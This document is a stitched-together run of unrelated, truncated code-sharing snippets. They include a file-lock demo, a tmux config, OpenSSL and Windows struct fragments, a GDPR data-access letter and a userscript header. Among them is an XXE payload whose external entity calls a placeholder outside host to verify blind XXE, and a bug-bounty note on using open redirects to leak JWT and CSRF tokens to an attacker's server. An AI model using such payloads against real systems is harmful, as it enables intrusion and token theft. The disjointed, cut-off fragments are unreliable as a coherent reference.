For educational reasons I've decided to create my own CA. Here is what I learned.
Lets get some context first.
Tested on Mac OS X 10.6.6 and Ubuntu 10.10 with Python 2.6.6 | |
To try it out, open up a python shell and type: | |
>>> from lock import FileLock | |
>>> lock = FileLock("my_lock", dir="/var/tmp") | |
>>> lock.acquire() | |
Leave the first shell open, and open another python shell and type the same thing: | |
>>> from lock import FileLock | |
>>> lock = FileLock("my_lock", dir="/var/tmp") |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
#!/usr/bin/env bash | |
# set -x | |
if [[ $EUID -ne 0 ]]; then | |
echo "You must be root to run this script" | |
exit 1 | |
fi | |
# Returns all available interfaces, except "lo" and "veth*". |
# Set the control character to Ctrl+Spacebar (instead of Ctrl+B) | |
set -g prefix C-space | |
unbind-key C-b | |
bind-key C-space send-prefix | |
# Set new panes to open in current directory | |
bind c new-window -c "#{pane_current_path}" | |
bind '"' split-window -c "#{pane_current_path}" | |
bind % split-window -h -c "#{pane_current_path}" |
#include <openssl/conf.h> | |
#include <openssl/evp.h> | |
#include <openssl/err.h> | |
#include <string.h> | |
int main (void) | |
{ | |
/* A 256 bit key */ | |
unsigned char *key = (unsigned char *)"01234567890123456789012345678901"; |
typedef struct tagCREATELINKDATA { | |
ULONG dwFlags; | |
WCHAR szLinkName[MAX_PATH]; // + 0x20C | |
WCHAR szExeName[MAX_PATH]; // + 0x414 | |
WCHAR szParams[MAX_PATH]; // + 0x61C | |
WCHAR szWorkingDir[MAX_PATH]; // + 0x824 | |
WCHAR szOriginalName[MAX_PATH]; // + 0xA2C | |
WCHAR szExpExeName[MAX_PATH]; // + 0xC34 | |
WCHAR szProgDesc[MAX_PATH]; // + 0xE3C | |
WCHAR szFolder[MAX_PATH]; // + 0x1044 |
Dear Sir/Madam: | |
I am writing to you in your capacity as data protection officer for your | |
company. In light of recent spam received on this email address, | |
I am making this request for access to personal data | |
pursuant to Article 15 of the General Data Protection Regulation. | |
I am concerned that your company’s information practices may be putting my | |
personal information at undue risk of exposure or in fact has breached its | |
obligation to safeguard my personal information. |
An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.
x-csrf-token
set to the CSRF token for the session of the user
GET /verify/VALUE HTTP/1.1
Host: example.com
// ==UserScript== | |
// @name noVNC Paste for Proxmox | |
// @namespace http://tampermonkey.net/ | |
// @version 0.2a | |
// @description Pastes text into a noVNC window (for use with Proxmox specifically) | |
// @author Chester Enright | |
// @match https://* | |
// @include /^.*novnc.*/ | |
// @require http://code.jquery.com/jquery-3.3.1.min.js | |
// @grant none |